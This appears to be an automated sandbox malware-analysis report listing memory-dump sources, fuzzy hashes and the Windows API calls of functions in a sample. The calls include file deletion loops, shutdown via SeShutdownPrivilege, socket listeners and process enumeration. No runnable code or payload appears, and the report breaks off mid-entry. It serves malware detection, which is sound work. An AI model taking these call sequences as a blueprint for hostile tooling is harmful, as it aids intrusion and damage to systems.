                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                • String ID: *.*
                                                • API String ID: 713712311-438819550
                                                • Opcode ID: 766704e410dc8d0e47af2056352dd1e3f288cbbade954143ce46b581126c7cf4
                                                • Instruction ID: c0453b857662766a2d22928245ada6f166144360fd2e1223a77967582654fd77
                                                • Opcode Fuzzy Hash: 766704e410dc8d0e47af2056352dd1e3f288cbbade954143ce46b581126c7cf4
                                                • Instruction Fuzzy Hash: EE418C72D0024AAFCF11EF65DC45AEEBBB8FF15320F14446AE815A3191DB359A48EB90
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID:
                                                • API String ID: 4104443479-0
                                                • Opcode ID: 54218357dbcf6391d049c672e7022ffeb55753c3f4c18b11ad8384ee74377ac4
                                                • Instruction ID: e40f5305c935e405624c03f0718073d059dd2b8fe25a8fb167931f177f9dc66c
                                                • Opcode Fuzzy Hash: 54218357dbcf6391d049c672e7022ffeb55753c3f4c18b11ad8384ee74377ac4
                                                • Instruction Fuzzy Hash: D012BD70A00609DFDF14DFA5D981AEEB7F6FF48310F14452AE846A7250EB3AAD14EB50
                                                APIs
                                                  • Part of subcall function 00F84750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F84743,?,?,00F837AE,?), ref: 00F84770
                                                  • Part of subcall function 00FE4A31: GetFileAttributesW.KERNEL32(?,00FE370B), ref: 00FE4A32
                                                • FindFirstFileW.KERNEL32(?,?), ref: 00FE3B89
                                                • DeleteFileW.KERNEL32(?,?,?,?), ref: 00FE3BD9
                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00FE3BEA
                                                • FindClose.KERNEL32(00000000), ref: 00FE3C01
                                                • FindClose.KERNEL32(00000000), ref: 00FE3C0A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                • String ID: \*.*
                                                • API String ID: 2649000838-1173974218
                                                • Opcode ID: c6305c311e7b1aeaadd214b66503d4a1227d71924204e16157cb80c729d452cf
                                                • Instruction ID: ad6d8eca0706f652f6694d9b6702968c3b6dc7bf51b984cc9d5a22e6235a9639
                                                • Opcode Fuzzy Hash: c6305c311e7b1aeaadd214b66503d4a1227d71924204e16157cb80c729d452cf
                                                • Instruction Fuzzy Hash: 67316B310083859BC211FF24DC999EFBBE8AE95324F444E1DF4D593191EB29DA09EB63
                                                APIs
                                                  • Part of subcall function 00FD87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FD882B
                                                  • Part of subcall function 00FD87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FD8858
                                                  • Part of subcall function 00FD87E1: GetLastError.KERNEL32 ref: 00FD8865
                                                • ExitWindowsEx.USER32(?,00000000), ref: 00FE51F9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                • String ID: $@$SeShutdownPrivilege
                                                • API String ID: 2234035333-194228
                                                • Opcode ID: a9d93f308bc6ee817ed22ddd9aac7bcc87d109ec6ac7fb9bac9cd410b94371af
                                                • Instruction ID: 203846f81db47e632b3a53e80c3ca7a7a3dd4d883712164237217e0352a92f6f
                                                • Opcode Fuzzy Hash: a9d93f308bc6ee817ed22ddd9aac7bcc87d109ec6ac7fb9bac9cd410b94371af
                                                • Instruction Fuzzy Hash: D2017B36B916536BF738626AAC8AFBB7258EB04B58F240461FB43E20C1D9561C01B290
                                                APIs
                                                • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00FF62DC
                                                • WSAGetLastError.WSOCK32(00000000), ref: 00FF62EB
                                                • bind.WSOCK32(00000000,?,00000010), ref: 00FF6307
                                                • listen.WSOCK32(00000000,00000005), ref: 00FF6316
                                                • WSAGetLastError.WSOCK32(00000000), ref: 00FF6330
                                                • closesocket.WSOCK32(00000000,00000000), ref: 00FF6344
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: ErrorLast$bindclosesocketlistensocket
                                                • String ID:
                                                • API String ID: 1279440585-0
                                                • Opcode ID: b643beef8118d710a098d1cb7ecad8f07167189c60331c6b41b0d49694a95e50
                                                • Instruction ID: 77ece10be2ba93af596d1c166ce4f731e06e5da2ccb87322b77aeaf9d7ffed32
                                                • Opcode Fuzzy Hash: b643beef8118d710a098d1cb7ecad8f07167189c60331c6b41b0d49694a95e50
                                                • Instruction Fuzzy Hash: 4421D0316002099FCB20EF64CC85BBEB7A9EF48724F184159EA56E7391CB74AD05EB51
                                                APIs
                                                  • Part of subcall function 00FA0DB6: std::exception::exception.LIBCMT ref: 00FA0DEC
                                                  • Part of subcall function 00FA0DB6: __CxxThrowException@8.LIBCMT ref: 00FA0E01
                                                • _memmove.LIBCMT ref: 00FD0258
                                                • _memmove.LIBCMT ref: 00FD036D
                                                • _memmove.LIBCMT ref: 00FD0414
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                • String ID:
                                                • API String ID: 1300846289-0
                                                • Opcode ID: 5f674fec4d755b4449726bb76c773b5a19f7d07433c86490a22b6b920ca01ae5
                                                • Instruction ID: 706874f8d94249090618154c97e2691cf0af516f3a8a723e3770e56d48f86aad
                                                • Opcode Fuzzy Hash: 5f674fec4d755b4449726bb76c773b5a19f7d07433c86490a22b6b920ca01ae5
                                                • Instruction Fuzzy Hash: 4E02C0B1E00209DBDF05DF64D981AAE7BB6EF44310F54806AE806DB355EF35D910EB91
                                                APIs
                                                  • Part of subcall function 00F82612: GetWindowLongW.USER32(?,000000EB), ref: 00F82623
                                                • DefDlgProcW.USER32(?,?,?,?,?), ref: 00F819FA
                                                • GetSysColor.USER32(0000000F), ref: 00F81A4E
                                                • SetBkColor.GDI32(?,00000000), ref: 00F81A61
                                                  • Part of subcall function 00F81290: DefDlgProcW.USER32(?,00000020,?), ref: 00F812D8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: ColorProc$LongWindow
                                                • String ID:
                                                • API String ID: 3744519093-0
                                                • Opcode ID: 331918312af76e1462b0ce628fca8725aaf7123071d2edbe07b0949181c133cd
                                                • Instruction ID: 4fc839f5cafda2fc2a1f23b89549154bf87beef43e1db0ff8a32b4acc395338f
                                                • Opcode Fuzzy Hash: 331918312af76e1462b0ce628fca8725aaf7123071d2edbe07b0949181c133cd
                                                • Instruction Fuzzy Hash: CDA134B2506546BBFA38BA29CC88EFB355CFB42361F14031AF542D2181DA6D9D03B7B1
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?), ref: 00FEBCE6
                                                • _wcscmp.LIBCMT ref: 00FEBD16
                                                • _wcscmp.LIBCMT ref: 00FEBD2B
                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00FEBD3C
                                                • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00FEBD6C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Find$File_wcscmp$CloseFirstNext
                                                • String ID:
                                                • API String ID: 2387731787-0
                                                • Opcode ID: 26f5f48ef07ebd5a013dcdda7b319ed4f6d42f9f95c9eeef151a0da2112ae0f8
                                                • Instruction ID: 4b14757ed503de8866e65033e5a43ba177485c073cbd79c5a462d8cac1276ceb
                                                • Opcode Fuzzy Hash: 26f5f48ef07ebd5a013dcdda7b319ed4f6d42f9f95c9eeef151a0da2112ae0f8
                                                • Instruction Fuzzy Hash: 5A51C075A046029FC724EF29D890EAAB3E8FF49320F14461DF956873A1DB34ED04EB91
                                                APIs
                                                  • Part of subcall function 00FF7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00FF7DB6
                                                • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00FF679E
                                                • WSAGetLastError.WSOCK32(00000000), ref: 00FF67C7
                                                • bind.WSOCK32(00000000,?,00000010), ref: 00FF6800
                                                • WSAGetLastError.WSOCK32(00000000), ref: 00FF680D
                                                • closesocket.WSOCK32(00000000,00000000), ref: 00FF6821
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                • String ID:
                                                • API String ID: 99427753-0
                                                • Opcode ID: fe0a8fd742e3ba6f8a2dd69bb9cf2d61eb5361b5c8412f362770ba1115218d58
                                                • Instruction ID: 285fcdfacb750286dd9ee94314c8aa1efc1c2f3826efa92898af6fb26d1155f8
                                                • Opcode Fuzzy Hash: fe0a8fd742e3ba6f8a2dd69bb9cf2d61eb5361b5c8412f362770ba1115218d58
                                                • Instruction Fuzzy Hash: 7741E575A00214AFDB60BF248C86FBE77A89F04754F48845CFA56AB3D2CA789D01A791
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                • String ID:
                                                • API String ID: 292994002-0
                                                • Opcode ID: 8c296ff9c113413346e91bca3eb5ab095d8e852a3d06e385c6947cbb95a14dc7
                                                • Instruction ID: 9def75770f6e8811e89b2ea605abce6bc1bfae8fa3f9dc7074d74b497ad3297c
                                                • Opcode Fuzzy Hash: 8c296ff9c113413346e91bca3eb5ab095d8e852a3d06e385c6947cbb95a14dc7
                                                • Instruction Fuzzy Hash: 0211E2313001126BFB326F2A9C44A6EBBD8EF44761F448028F986D3281CBB998019BA0
                                                APIs
                                                • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00FD80C0
                                                • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00FD80CA
                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00FD80D9
                                                • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00FD80E0
                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00FD80F6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                • String ID:
                                                • API String ID: 44706859-0
                                                • Opcode ID: 3dbbfbc3dbb43d16f0362b013a828170782e42a87750978d84b7a430a00bb5ef
                                                • Instruction ID: 130a92e95c4191f0602bb73d42454b98177263610aca9b57cdc1d31b23e74880
                                                • Opcode Fuzzy Hash: 3dbbfbc3dbb43d16f0362b013a828170782e42a87750978d84b7a430a00bb5ef
                                                • Instruction Fuzzy Hash: 67F06831244305AFD7315F65DC8DE673BADEF497A5F044016F545C6240CB659C46FB60
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00F84AD0), ref: 00F84B45
                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00F84B57
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: GetNativeSystemInfo$kernel32.dll
                                                • API String ID: 2574300362-192647395
                                                • Opcode ID: 2b6fc6d53e0668518204696c74174e1ac9bb8e23f4faed0b3aa323dfc49e5ba4
                                                • Instruction ID: 5c7ac0afad7036f2151c59b7c3f8f0b51b1ef5aa7bea9ac70ca0f8db2e664e17
                                                • Opcode Fuzzy Hash: 2b6fc6d53e0668518204696c74174e1ac9bb8e23f4faed0b3aa323dfc49e5ba4
                                                • Instruction Fuzzy Hash: C0D01234A10713CFD731AF32D828B8676D4AF45351F11882D94C5D6140E674E880EB54
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: __itow__swprintf
                                                • String ID:
                                                • API String ID: 674341424-0
                                                • Opcode ID: fda643346f1264f56dd1b9b30995e565a030cd3a2db1640e44027447e9d12f28
                                                • Instruction ID: 450da54ad5abccae45a7d210324b85e9fbb416e31a82d0c61bbed01ea8e28e78
                                                • Opcode Fuzzy Hash: fda643346f1264f56dd1b9b30995e565a030cd3a2db1640e44027447e9d12f28
                                                • Instruction Fuzzy Hash: 0622BF726083019FDB24EF18C881BAFB7E4BF84714F14491DF89A97291DB75E904EB92
                                                APIs
                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00FFEE3D
                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00FFEE4B
                                                  • Part of subcall function 00F87DE1: _memmove.LIBCMT ref: 00F87E22
                                                • Process32NextW.KERNEL32(00000000,?), ref: 00FFEF0B
                                                • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00FFEF1A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                • String ID:
                                                • API String ID: 2576544623-0
                                                • Opcode ID: e43bfb85ee03a9f49e6b6a543860d0015814d50174be3c104a912a33097937f3
                                                • Instruction ID: f3a8c78d97105cf5fb12e9de8c0896c9db51c0855f6487d531b6db41389bac96
                                                • Opcode Fuzzy Hash: e43bfb85ee03a9f49e6b6a543860d0015814d50174be3c104a912a33097937f3
                                                • Instruction Fuzzy Hash: F2517A71508315ABD320EF20DC81EABB7E8EF94710F50482DF595962A1EB74E908DB92
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: BuffCharUpper
                                                • String ID:
                                                • API String ID: 3964851224-0
                                                • Opcode ID: 36307e8f6bc43a9e07a303e901641e30be23d4b0eeb95a506fdf363f95a28807
                                                • Instruction ID: 80022800b1d3e5e2691e44754c1f4f353b2fbe1093d91484d8f1bbfca8f0a88b
                                                • Opcode Fuzzy Hash: 36307e8f6bc43a9e07a303e901641e30be23d4b0eeb95a506fdf363f95a28807
                                                • Instruction Fuzzy Hash: 3492AE71A083418FDB20DF14C581B6AB7E1BF85314F14892DF88A8B362DB75EC45EB92
                                                APIs
                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00FDE628
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: lstrlen
